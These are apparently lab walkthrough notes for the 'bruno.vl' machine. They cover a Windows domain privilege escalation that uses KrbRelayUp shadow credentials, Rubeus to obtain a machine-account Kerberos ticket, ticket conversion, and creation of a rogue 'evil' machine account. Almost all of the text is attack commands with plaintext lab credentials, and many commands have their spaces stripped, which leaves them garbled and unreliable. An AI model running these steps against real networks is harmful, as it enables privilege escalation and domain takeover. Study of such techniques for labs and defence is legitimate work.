This is essentially a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).
# Check if LDAP signing is not enforcedcmeldapbruno.vl-u'svc_scan'-p'Sunshine1'-Mldap-checker# Check if we can use a shadow credential attack. We can abuse shadow credentials if PKINT is supported by DC, through cme we can verify the machine qouta
cmeldapbruno.vl-u'svc_scan'-p'Sunshine1'-Mmaq# Get CLSIDsc980e4c2-c178-4572-935d-a8a42988480690f18417-f0f1-484e-9d3c-59dceee5dbd803ca98d6-ff5d-49b8-abc6-03dd84127020d99e6e73-fc88-11d0-b498-00a0c90312f3 (certsrv.exe)42cbfaa7-a4a7-47bb-b422-bd10e9d02700000c101c-0000-0000-c000-0000000000461b48339c-d15e-45f3-ad55-a851cb66be6b49e6370b-ab71-40ab-92f4-b009593e451850d185b9-fff3-4656-92c7-e4018da4361d3c6859ce-230b-48a4-be6c-932c0c202048 (trusted installerservice)# https://vulndev.io/cheats-windows/
Attack with Shadow Account
Purpose: Create a shadow account for existing machine account and abuse it to get a TGT for Administrator
# KrbRelayUp attack for shadow account with certificate .\KrbRelayUp.exefull-mshadowcred-f-clsd99e6e73-fc88-11d0-b498-00a0c90312f3-p10246
# Get tgt Rubeus.exe asktgt /user:<DC name> /certificate:<base 64 of certificate> /password:<Certificate Password> /enctype:<PKINIT etype> /nowrap
PS> .\Rubeus.exeasktgt/user:brunodc$ /certificate:MIIKSA...<snip>/password:xP9-kA9#oX0#/enctype:AES256/nowrap# Ensure that the ticket is issued to the machine account.
# Conver the ticket # copy and paste the base64 ticket to a bruno_ticket file cat./bruno_ticket|base64-d>bruno_ticket.kirbiticketConverter.pybruno_ticket.kirbibruno_ticket.ccache
# Create a new machine account ./Sharpmad.exeMAQ-Actionnew-MachineAccountevil-MachinePasswordPass.123
# Get the SID of new accountPS> $o = ([ADSI]"LDAP://CN=evil,CN=Computers,DC=bruno,DC=vl").objectSID PS> (New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value